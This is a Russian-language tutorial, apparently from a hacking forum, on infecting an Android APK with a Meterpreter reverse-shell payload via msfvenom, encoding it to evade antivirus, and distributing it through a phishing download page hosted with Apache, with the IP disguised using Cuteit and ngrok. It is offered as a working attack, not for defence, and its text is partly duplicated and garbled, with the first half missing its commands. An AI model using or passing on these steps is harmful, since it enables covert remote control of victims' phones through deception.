Для начала, нам необходимо будет скачать какой-нибудь APK файл не более 5 мб, для этого идём на 4PDA, ищем там что-нибудь подходящее и качаем, я использую софт для загрузки музыки из вк.
Теперь открываем терминал и прописываем:
-x - использовать такой то файл
-p - прилепить пейлоад
-o - назвать получившийся файл так-то
-e - зашифровать от обнаружения антивирусами
-i - количество "слоёв" шифрования
Жмём Enter и ждем, когда веном либо выдаст ошибку, либо скомпилирует файл.
Если выдает ошибку, обновляем версию APKtool. Если не помогло, ищем другую АПкашку для заражения.
Теперь используя фишинг и СИ, сделаем простенькую страничку для нашего софта.
Страничку можно создать, используя конфигураторы сайтов либо использовать исходник приложенный ниже. Если вы используйте конфигуратор, знайте, что он прилепит к ней вагон ненужного кода, и прочий мусор.
Исходник ( Облако Mail )
pass - social_engineering
Содержимое папки Social по адресу
forgo меняем на название вашего файла.
В терминале пишем
Как всё запустится, открываем браузер, вводим в адресную строку свой ИП.
Для того, чтобы наш ИП стал похож на веб адрес, нам понадобится программа Cuteit, которую мы скачаем с гитхаба
https://github.com/D4Vinci/Cuteit.git
там можно тупо следовать инструкции из файла readme
переходим в папку с кутитом через терминал и прописываем команду
Получаем такую картину:
Выбираем любую ссылку, вводим в адресную строку и попадаем на наш сервер.
Но в адресной строке в тот же момент появляется палево, в виде нашего ip.
Это мы победим при помощи Ngrok.
Идем по ссылке:
https://ngrok.com/download
Качаем, регистрируемся и следуя инструкции, добавляем ключи, иначе не будет работать как нужно.
Когда всё готово, через терминал переходим в папку с ngrok и прописываем
Наши рабочие ссылки в строке Forwarding
Готово.
Теперь открываем терминал и прописываем:
Код:
msfvenom -x '/директория где находится файл который мы будем заражать/DownloadMusic-1.5.apk' -p android/meterpreter/reverse_tcp LHOST=(ip вашего компа) LPORT=8080 -e x86/shikata_ga_nai -i 10 -o название итога.apk-p - прилепить пейлоад
-o - назвать получившийся файл так-то
-e - зашифровать от обнаружения антивирусами
-i - количество "слоёв" шифрования
Жмём Enter и ждем, когда веном либо выдаст ошибку, либо скомпилирует файл.
Если выдает ошибку, обновляем версию APKtool. Если не помогло, ищем другую АПкашку для заражения.
Теперь используя фишинг и СИ, сделаем простенькую страничку для нашего софта.
Страничку можно создать, используя конфигураторы сайтов либо использовать исходник приложенный ниже. Если вы используйте конфигуратор, знайте, что он прилепит к ней вагон ненужного кода, и прочий мусор.
Исходник ( Облако Mail )
pass - social_engineering
Содержимое папки Social по адресу
/var/www/html (APK, который мы заразили, помещаем туда же)
Открываем файл index.html при помощи текстового редактора и исправляем все надписи на нужные вам, в частности
<a href="forgo.apk">Установить</a>forgo меняем на название вашего файла.
В терминале пишем
Код:
sudo systemctl start apache2Как всё запустится, открываем браузер, вводим в адресную строку свой ИП.
Для того, чтобы наш ИП стал похож на веб адрес, нам понадобится программа Cuteit, которую мы скачаем с гитхаба
https://github.com/D4Vinci/Cuteit.git
там можно тупо следовать инструкции из файла readme
переходим в папку с кутитом через терминал и прописываем команду
Код:
python ./Cuteit.py ваш ИП например 123.15.46.54Получаем такую картину:
Выбираем любую ссылку, вводим в адресную строку и попадаем на наш сервер.
Но в адресной строке в тот же момент появляется палево, в виде нашего ip.
Это мы победим при помощи Ngrok.
Идем по ссылке:
https://ngrok.com/download
Качаем, регистрируемся и следуя инструкции, добавляем ключи, иначе не будет работать как нужно.
Когда всё готово, через терминал переходим в папку с ngrok и прописываем
Код:
sudo ./ngrok http 80Наши рабочие ссылки в строке Forwarding
Готово.
